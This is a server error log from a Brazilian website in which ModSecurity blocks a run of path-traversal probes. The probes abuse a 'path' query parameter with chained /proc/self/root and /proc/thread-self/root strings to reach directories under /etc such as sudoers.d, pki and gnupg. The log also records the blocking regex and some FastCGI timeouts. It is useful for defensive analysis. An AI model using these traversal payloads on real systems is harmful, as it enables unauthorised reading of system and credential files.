[Fri Mar 20 00:15:55.599482 2026] [:error] [pid 21563:tid 140411674785536] [client 74.7.241.31:52692] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby760pm7ZmxKZTM4bZ5QQAAA4g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:15:56.132164 2026] [proxy_fcgi:error] [pid 21563:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:58482] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:16:00.379648 2026] [:error] [pid 19655:tid 140411725141760] [client 74.7.241.31:51130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby78E1ujooLWdUDGy4IKAAAAEI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:05.476588 2026] [:error] [pid 27293:tid 140411708356352] [client 74.7.241.31:51140] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby79P-YZRR_7pZ7nDLABQAAA8Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:13.230980 2026] [:error] [pid 21563:tid 140411599251200] [client 74.7.241.31:49768] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby7_Epm7ZmxKZTM4bZ5RwAAA5E"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:20.904635 2026] [proxy_fcgi:error] [pid 26799:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:59192] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:16:21.014193 2026] [:error] [pid 7235:tid 140411708356352] [client 74.7.241.31:34784] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8BPqxLDW4GITHUkScsQAAAQQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:31.365383 2026] [:error] [pid 20435:tid 140411741927168] [client 74.7.241.31:49562] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8D5JaM1-0uhhUQJNLtQAAAIA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:43.057845 2026] [proxy_fcgi:error] [pid 26799:tid 140411691570944] (70007)The timeout specified has expired: [client 179.188.53.243:59898] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:16:45.647671 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:38102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8HfqxLDW4GITHUkScvQAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:52.499752 2026] [:error] [pid 7235:tid 140411699963648] [client 74.7.241.31:45126] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8JPqxLDW4GITHUkScwQAAAQU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:56.430623 2026] [:error] [pid 30077:tid 140411716749056] [client 74.7.241.31:45128] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8KPu8EFLIOrSqIpvbDAAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:16:58.718531 2026] [:error] [pid 21563:tid 140411590858496] [client 74.7.241.31:60076] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8Kkpm7ZmxKZTM4bZ5WQAAA5I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:03.991275 2026] [:error] [pid 21219:tid 140411565680384] [client 74.7.241.31:60086] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8L_XLqtnMIWvjpaJSRQAAApU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:04.435248 2026] [core:alert] [pid 20435:tid 140411607643904] [client 57.141.18.55:36498] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Fri Mar 20 00:17:06.055125 2026] [proxy_fcgi:error] [pid 27293:tid 140411641214720] (70007)The timeout specified has expired: [client 179.188.53.243:60630] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:17:07.599151 2026] [:error] [pid 20435:tid 140411658000128] [client 74.7.241.31:52986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8M5JaM1-0uhhUQJNL2AAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:12.056847 2026] [:error] [pid 14269:tid 140411565680384] [client 74.7.241.31:53002] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8OAbLMZ6AikZjR9WQpQAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:15.687139 2026] [:error] [pid 21219:tid 140411616036608] [client 74.7.241.31:53008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8O_XLqtnMIWvjpaJSRwAAAo8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:18.238872 2026] [:error] [pid 21563:tid 140411725141760] [client 74.7.241.31:53022] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8Pkpm7ZmxKZTM4bZ5ZQAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:19.945272 2026] [:error] [pid 21563:tid 140411725141760] [client 74.7.241.31:36592] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8P0pm7ZmxKZTM4bZ5ZwAAA4I"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:22.535291 2026] [:error] [pid 19655:tid 140411548894976] [client 74.7.241.31:36602] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8Qk1ujooLWdUDGy4IPQAAAFc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:25.967863 2026] [:error] [pid 8307:tid 140411607643904] [client 74.7.243.128:58448] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8Rb-FhjpZGs9ba8qeuQAAAxA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:26.914125 2026] [:error] [pid 8307:tid 140411607643904] [client 74.7.241.31:36612] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8Rr-FhjpZGs9ba8qeugAAAxA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:30.097821 2026] [proxy_fcgi:error] [pid 27293:tid 140411699963648] (70007)The timeout specified has expired: [client 179.188.53.243:33246] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:17:30.347962 2026] [:error] [pid 27293:tid 140411699963648] [client 74.7.241.31:55008] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8Sv-YZRR_7pZ7nDLANAAAA8U"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:39.009319 2026] [:error] [pid 17887:tid 140411557287680] [client 74.7.243.128:48010] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "aby8UwkwaGbbGflqUZD-jQAAANY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 00:17:53.104678 2026] [proxy_fcgi:error] [pid 21219:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:34012] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:18:17.125862 2026] [proxy_fcgi:error] [pid 7893:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:34782] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:18:41.141837 2026] [proxy_fcgi:error] [pid 27293:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:35584] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 00:19:05.137849 2026] [proxy_fcgi:error] [pid 20435:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:36422] AH01075: Error dispatching request to : (polling)
